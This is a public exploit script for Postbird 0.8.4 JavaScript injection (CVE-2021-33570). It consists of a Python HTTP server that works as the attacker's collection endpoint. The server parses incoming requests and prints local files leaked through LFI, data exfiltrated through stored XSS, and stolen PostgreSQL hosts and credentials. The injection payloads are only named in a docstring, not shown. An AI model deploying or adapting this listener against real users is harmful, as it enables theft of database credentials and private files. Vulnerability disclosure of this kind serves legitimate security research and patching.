# Exploit Title: Postbird 0.8.4 - Javascript Injection # Date: [26 May 2021] # Exploit Author: Debshubra Chakraborty # Vendor Homepage: https://github.com/paxa/postbird # Software Link: https://www.electronjs.org/apps/postbird # Version: 0.8.4 # Tested on: Linux # CVE : CVE-2021-33570 """ XSS Payload LFI Payload PostgreSQL Password Stealing Payload """ from http.server import BaseHTTPRequestHandler, HTTPServer import urllib.parse import re hostName = '0.0.0.0' serverPort = 5555 class MyServer(BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) parse(urllib.parse.unquote(self.requestline)) def log_message(self, format, *args): return def parse(data): expression = re.search('\S+=', data) attr = expression.group() if attr[2:len(attr)-1] == 'file': data = data[12:len(data)-11] data = data.rsplit('\\n') print(f'\n[+] File received from LFI: \n\n') for output in data: print(output) elif attr[2:len(attr)-1] == 'xss': data = data[11:len(data)-10] print(f'\n[+] Data exfiltration from Stored XSS: \n\n{data}') elif attr[2:len(attr)-1] == 'credentials': pos = re.search('{"\S+:', data) data = data[pos.start():len(data)-11] for i in range(2, len(data), 1): if data[i] == '"': pos = i break host = data[2:pos] data = data[14:] data = data.rsplit(',') print(f'\n\n[+] The Database credentials received\n\nHost = {host}') for output in data: print(output) else: print(f'\n\n[-] Unknown header attribute found, atribute = {attr[2:len(attr)-1]}') def main(): global hostName, serverPort webServer = HTTPServer((hostName, serverPort), MyServer) print("Server started http://%s:%s" % (hostName, serverPort)) try: webServer.serve_forever() except KeyboardInterrupt: pass webServer.server_close() print("\nServer stopped.") if __name__ == "__main__": main()